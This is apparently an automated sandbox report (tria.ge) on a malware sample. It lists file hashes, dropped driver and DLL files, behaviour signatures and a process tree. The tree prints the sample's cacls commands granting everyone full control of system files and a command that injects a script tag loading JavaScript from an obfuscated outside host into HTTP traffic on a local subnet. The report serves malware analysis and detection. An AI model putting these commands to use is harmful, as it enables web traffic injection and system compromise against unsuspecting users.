Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
31s -
max time network
20s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
22/08/2024, 15:01
Static task
static1
Behavioral task
behavioral1
Sample
b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe
-
Size
525KB
-
MD5
b817832560fca5244ef3393152e3c7a8
-
SHA1
094de5817d77cef6339100698cf4c3df965383e2
-
SHA256
5f15488a7e355492829edaf3a8755619384dc725aa836eff1f3d364d5719e772
-
SHA512
9ae2333af910fe0ef90fdf125e6b99c88fc2a46881341ff2b55ed32dc862b7e88756fd69def7410911b72e6b1b1c6f6be64c97bae3f60c80b07e9076727c9094
-
SSDEEP
6144:EhcMSbFohE9q2PsXrSVew/X2+wZHeSPVep6s6BCF6GfEWfadRNH0QMgNoS4:ESNF2E9/cZw/X6eSPtfS6G6IgNoS4
Malware Config
Signatures
-
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\drivers\npf.sys b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe -
Deletes itself 1 IoCs
pid Process 2004 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 2836 360uczq.exe -
Loads dropped DLL 5 IoCs
pid Process 2732 b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe 2732 b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe 2836 360uczq.exe 2836 360uczq.exe 2836 360uczq.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File created C:\Windows\SysWOW64\Packet.dll b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe File created C:\Windows\SysWOW64\WanPacket.dll b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe File created C:\Windows\SysWOW64\wpcap.dll b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe File created C:\Windows\SysWOW64\360uczq.exe b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2732 wrote to memory of 264 2732 b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe 29 PID 2732 wrote to memory of 264 2732 b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe 29 PID 2732 wrote to memory of 264 2732 b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe 29 PID 2732 wrote to memory of 264 2732 b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe 29 PID 2732 wrote to memory of 2220 2732 b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe 31 PID 2732 wrote to memory of 2220 2732 b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe 31 PID 2732 wrote to memory of 2220 2732 b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe 31 PID 2732 wrote to memory of 2220 2732 b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe 31 PID 2732 wrote to memory of 2216 2732 b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe 33 PID 2732 wrote to memory of 2216 2732 b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe 33 PID 2732 wrote to memory of 2216 2732 b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe 33 PID 2732 wrote to memory of 2216 2732 b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe 33 PID 2732 wrote to memory of 2324 2732 b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe 35 PID 2732 wrote to memory of 2324 2732 b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe 35 PID 2732 wrote to memory of 2324 2732 b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe 35 PID 2732 wrote to memory of 2324 2732 b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe 35 PID 2732 wrote to memory of 2776 2732 b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe 37 PID 2732 wrote to memory of 2776 2732 b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe 37 PID 2732 wrote to memory of 2776 2732 b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe 37 PID 2732 wrote to memory of 2776 2732 b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe 37 PID 2732 wrote to memory of 2836 2732 b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe 39 PID 2732 wrote to memory of 2836 2732 b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe 39 PID 2732 wrote to memory of 2836 2732 b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe 39 PID 2732 wrote to memory of 2836 2732 b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe 39 PID 2732 wrote to memory of 2004 2732 b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe 41 PID 2732 wrote to memory of 2004 2732 b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe 41 PID 2732 wrote to memory of 2004 2732 b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe 41 PID 2732 wrote to memory of 2004 2732 b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe 41
Processes
-
C:\Users\Admin\AppData\Local\Temp\b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe"1⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" C:\Windows\system32\drivers\npf.sys /e /p everyone:f2⤵
- System Location Discovery: System Language Discovery
PID:264
-
-
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" C:\Windows\system32\Packet.dll /e /p everyone:f2⤵
- System Location Discovery: System Language Discovery
PID:2220
-
-
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" C:\Windows\system32\WanPacket.dll /e /p everyone:f2⤵
- System Location Discovery: System Language Discovery
PID:2216
-
-
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" C:\Windows\system32\wpcap.dll /e /p everyone:f2⤵
- System Location Discovery: System Language Discovery
PID:2324
-
-
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" C:\Windows\system32\npptools.dll /e /p everyone:f2⤵
- System Location Discovery: System Language Discovery
PID:2776
-
-
C:\Windows\SysWOW64\360uczq.exe-idx 0 -ip 10.127.0.2-10.127.0.254 -port 80 -insert "<script language=JavaScript src=http://c%61d.K%77%69k.%54o/tj.js></script>"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2836
-
-
C:\Windows\SysWOW64\cmd.execmd /c 12.bat2⤵
- Deletes itself
- System Location Discovery: System Language Discovery
PID:2004
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5879d75bc6bed2e1f30abd91f361f66b9
SHA14a5bb4b3dcd6ec251486ad4040e47e4bf566391f
SHA256b843640f36bad63e06b554fcf02c6485bf4a9fe085484dfe5a6d90adbfa81a36
SHA512ac55885e35577a2d1f5ab4a7ba35135cf163616f489cf0849fe5ed9b0e8e1e2f6573be8c3d95f8deca7fecc7b3452888d40c930bee2eca99149db167dd6d4a95
-
Filesize
8.0MB
MD50f34f181ff7272e8d24f7c05b216caf4
SHA194cdece17148a75acd371a367217b72adac991d1
SHA25678c1ba4922dc4a29d214b0543edf079fe438a973e8639b6d80965b44d0065bf3
SHA512cd58fe0a798726f99eac24461147e251d9f781843ba1e87c38d07a53a2e06f0d71802f3cd5b80a7cbefdcffdd5966371b8870052de3da7f5d6c8bbc67fd979e2
-
Filesize
86KB
MD59062aeea8cbfc4f0780bbbefad7cebcb
SHA1c4ad39ec51ad0e84fe58f62931d13cddfde3189e
SHA256b2535129b26366484c487cc2ce536d8fcfa9d1ac1dab0db9560b4532012c352c
SHA51260957548fc2272998aea518acf3b1812ed77f73e960a99ddf0d6b474b0858225286c26554bf81c00acf3cb1c77c5ce458d80e149ed4766287d7e32af9681e646
-
Filesize
66KB
MD5fdd104a9fd3427a1df37041fa947a041
SHA1cca1881a3c02033008f78cc39b712b637c7f3e13
SHA256384e928f13bc1c25ca16b3247d7ca942aec6834fadb05b1487f2c975678d4a9a
SHA5129dd082eb245b443cc75b37c69f0a17e15fcb9cdb676b058d87f9805ec7a928e721a681b940fcdd56fd81da4d308f0d514870c526c4f9c715b256a97ab6bb29f7
-
Filesize
234KB
MD5ce842d25e5b7e6ff21a86cad9195fbe8
SHA1d762270be089a89266b012351b52c595e260b59b
SHA2567e8c0119f352424c61d6fad519394924b7aedbf8bfb3557d53c2961747d4c7f3
SHA51284c23addda6ff006d4a3967b472af10a049b2a045d27d988d22153fc3ba517e21520a31eb061a2ef2abf302e365564dd4601d240ec3d5894fb96f10a9fae97d6